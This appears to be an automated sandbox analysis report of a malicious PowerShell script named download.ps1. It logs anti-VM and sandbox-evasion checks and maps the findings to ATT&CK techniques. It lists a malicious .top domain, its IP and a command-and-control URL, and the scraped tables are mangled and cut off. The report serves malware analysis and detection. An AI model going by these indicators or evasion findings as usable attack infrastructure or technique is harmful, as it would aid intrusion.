Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BD881B3 rdtscp 0_2_00007FFD9BD881B3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5796Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4045Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine`SJ
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1832085428.000001E2F90C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware`SJ
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine`
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.1832557825.000001E2F9330000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BD881B3 rdtscp 0_2_00007FFD9BD881B3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
DLL Side-Loading
1
Process Injection
121
Virtualization/Sandbox Evasion
OS Credential Dumping211
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager121
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.ps15%ReversingLabsWin32.Trojan.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
172.217.21.36
truefalse
    high
    gajaechkfhfghal.top
    45.61.136.138
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://gajaechkfhfghal.top/aoe6m40s3hhtr.php?id=user-PC&key=85684789732&s=527false
        unknown
        http://www.google.com/false
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://gajaechkfhfghal.toppowershell.exe, 00000000.00000002.1792974672.000001E28173F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E2814B5000.00000004.00000800.00020000.00000000.sdmpfalse
            unknown
            https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifpowershell.exe, 00000000.00000002.1792974672.000001E282347000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.google.com/preferences?hl=enXpowershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28173F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/Licensepowershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://www.google.com/logos/doodles/2024/seasonal-holidays-202powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://schema.org/WebPagepowershell.exe, 00000000.00000002.1792974672.000001E28175B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E281795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E2824B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282670000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28263C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28265D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28266A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282656000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28232D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282320000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 